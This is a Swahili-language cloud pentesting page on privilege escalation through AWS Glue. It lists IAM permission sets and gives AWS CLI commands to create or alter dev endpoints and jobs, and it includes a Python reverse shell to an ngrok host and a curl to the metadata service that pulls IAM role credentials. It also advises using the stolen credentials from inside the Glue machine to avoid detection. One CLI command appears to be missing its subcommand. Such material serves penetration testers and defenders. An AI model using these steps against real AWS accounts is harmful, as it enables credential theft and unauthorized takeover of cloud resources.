AWS - Glue Privesc

Reading time: 4 minutes

glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Watumiaji walio na ruhusa hizi wanaweza kuanzisha endpoint mpya ya maendeleo ya AWS Glue, na kuteua service role iliyopo inayoweza kuchukuliwa na Glue ikiwa na ruhusa maalum kwa endpoint hii.

Baada ya usanidi, mshambuliaji anaweza kufikia instance ya endpoint kupitia SSH, na kuiba credentials za IAM za role iliyoteuliwa:

# Create endpoint
aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
--role-arn <arn-role> \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Kwa madhumuni ya kutofahamika, inashauriwa kutumia vitambulisho vya IAM kutoka ndani ya mashine pepe ya Glue.

Athari Inayowezekana: Privesc kwa glue service role iliyotajwa.

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Watumiaji wenye ruhusa hii wanaweza kubadilisha ufunguo wa SSH wa endpoint ya maendeleo ya Glue iliyopo, kuwezesha upatikanaji wa SSH kwake. Hii inamruhusu mshambuliaji kutekeleza amri kwa kutumia ruhusa za role iliyounganishwa na endpoint:

# Change public key to connect
aws glue --endpoint-name target_endpoint \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Athari Inayowezekana: Privesc kwa role ya huduma ya glue iliyotumika.

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

Watumiaji walio na iam:PassRole pamoja na glue:CreateJob au glue:UpdateJob, na pia glue:StartJobRun au glue:CreateTrigger, wanaweza kuunda au kusasisha job ya AWS Glue, kuambatanisha akaunti yoyote ya huduma ya Glue, na kuanzisha utekelezaji wa job. Uwezo wa job unajumuisha kukimbiza code yoyote ya Python, ambayo inaweza kutumiwa kuanzisha reverse shell. Reverse shell hii inaweza kisha kutumiwa kutoa nje IAM credentials za role iliyounganishwa na job ya Glue, na kusababisha upatikanaji usioidhinishwa au vitendo kulingana na ruhusa za role hiyo:

# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy


# A Glue role with admin access was created
aws glue create-job \
--name privesctest \
--role arn:aws:iam::93424712358:role/GlueAdmin \
--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'

# You can directly start the job
aws glue start-job-run --job-name privesctest
# Or you can create a trigger to start it
aws glue create-trigger --name triggerprivesc --type SCHEDULED \
--actions '[{"JobName": "privesctest"}]' --start-on-creation \
--schedule "0/5 * * * * *"  #Every 5mins, feel free to change

Athari Inayowezekana: Privesc kwa glue service role iliyotajwa.

glue:UpdateJob

Kwa ruhusa ya update pekee, mshambuliaji anaweza kuiba IAM Credentials za role iliyokuwa imeambatishwa.

Athari Inayowezekana: Privesc kwa glue service role iliyokuwa imeambatishwa.

References

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/